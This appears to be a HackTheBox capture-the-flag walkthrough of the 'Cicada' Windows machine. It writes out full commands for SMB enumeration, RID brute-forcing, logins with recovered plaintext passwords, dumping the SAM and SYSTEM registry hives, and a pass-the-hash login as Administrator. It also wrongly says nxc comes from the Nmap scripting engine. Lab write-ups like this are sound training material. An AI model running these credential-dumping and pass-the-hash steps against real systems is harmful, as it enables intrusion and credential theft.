Cicada Walkthrough — HackTheBox
An Easy Windows Machine
Introduction
In this write-up, We’ll go through an easy Windows machine where we gain initial foothold through SMB exploration and subsequently achieve privilege escalation using the SeBackupPrivilege feature.
Reconnaissance
- After Starting the machine, I set my target IP as $target environment variable and ran nmap command.
Command — Port Scan: Nmap
nmap $target --top-ports=1000 -sV -v -sC -Pn > nmap.out
2. Then, As usual I added the host: cicada.htb in /etc/hosts.
3. As the SMB was open, I used SMBclient to check if any share accepts ‘anonymous’ login.
Command — SMB Shares Listing: smbclient
smbclient -L 10.10.11.35
4. I was able to enumerate the share ‘HR’. There I found a file called ‘Notice from HR.txt’
5. Upon getting that file, I found a password mentioned in that file.
6. Now I have password, but no username. To find users in that server I used nxc to find usernames enumerating smb with rid.
Command — Finding Users in SMB: nxc
nxc smb 10.10.11.35 -u 'anonymous' -p '' - rid-brute 3000What is nxc?
nxc is a tool from the Nmap scripting engine to enumerate and exploit SMB (Server Message Block) services on Windows machines. In this context, RID stands for Relative Identifier. We’re using a brute-force approach to target RIDs ranging from 1000 to 4000, which typically encompasses common user accounts. This method allows us to gather details about those users in the SMB environment.
7. Let’s take all users (SidTypeUser) and put in a separate file ‘usernames.txt’.
8. Now, I don’t know which user uses the password I found above. Using Chatgpt, It told me to try hydra. But hydra didn’t work. Upon searching a bit, I decided to try each username in ‘enum4linux’
Command — Enumerating Users via SMB: enum4linux-ng
python3 enum4linux-ng.py -A -u 'Michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.10.11.35What is Enum4linux?
Enum4linux is a tool used primarily for enumerating information from Windows machines via SMB (Server Message Block) protocol. It is helpful to gather information about target system, user accounts, share information and other network resources.
What is RPC?
RPC stands for Remote Procedure Call, a protocol that allows a program to execute a function on another computer in a network as if it were local. It enables communication and function execution between different systems without needing the user to worry about the underlying details of the network communication.
9. Now I found another password for another user ‘david.orelious’.
10. I can use this password to explore more on SMB cause I wasn’t able to access ‘DEV’ share in SMB before.
Command — SMB Shares Listing for user ‘david.orelious’: smbclient
smbclient //10.10.11.35/DEV -U david.orelious
11. There is a ps1 file in ‘DEV’ SMB share. In that, I found another password for a user ‘emily.oscars’.
Initial Foothold — User Flag
- This file automates backing up a folder ‘smb’ to a destination folder ‘Backup’. To do this, they are using a credentials. So this must be the password for that user on the server. Let’s try evil-winrm.
If you want to know what is evil-winrm is, Read the below article:
Command — Login as user ‘emily.oscars’: evil-winrm
evil-winrm -i cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
2. I got initial foothold as emily.oscars user. User flag can be found in Desktop folder.
Privilege Escalation — Root Flag
- While doing privilege escalation, it’s essential to check for current user’s details and privileges.
Command — Info about Current user: whoami
whoami /all
2. As you can see, ‘SeBackupPrivilege’ is Enabled for our user ‘emily.oscars’.
What is SeBackupPrivilege?
SeBackupPrivilege was designed for allowing users to create backup copies of the system. Since it is not possible to make a backup of something that you cannot read. This privilege comes at the cost of providing the user with full read access to the file system. This privilege must bypass any ACL that the Administrator has placed in the network.
Read the below article to understand how this privilege escalation works:
3. ‘Emily.oscars’ user has the ability to read any file on the system because of ‘SeBackupPrivilege’. We can use this to read two important files called ‘sam’ and ‘system’ which can be used to achieve this privilege escalation.
What are the ‘SAM’ and ‘system’ files?
SAM and SYSTEM files are windows critical registry files (hive files) that store important information related to user accounts, passwords, and system settings.
The SAM file is a database that stores local user account information, including password hashes, for users on the machine.
The SYSTEM file contains information related to the system’s configuration, such as the machine’s hardware settings, and more importantly, the encryption keys used to secure the password hashes stored in the SAM file.
4. To avoid detection by Windows, I first moved to the Temp folder, then saved a copy of the SAM and SYSTEM files there.
Commands — saving SAM & SYSTEM files: reg
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
5. Now, Let’s just download the two files to our system with the ‘download’ command in evil-winrm.
6. I then used ‘secretsdump.py’ from impacket to extract password from sam & system files.
Command — Extract password for sam & system files: secretsdump.py
python3 /home/mrrobot/Downloads/AD/impacket/examples/secretsdump.py -sam sam -system system LOCAL > adminsecret.txt
7. Now, I have Administrator password hash which can be used again with evil-winrm to get root access.
Command — Login as Administrator: evil-winrm
evil-winrm -i cicada.htb -u 'Administrator' -p 'aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341
Now, We are ROOT! Thanks for Reading. Happy hacking!!
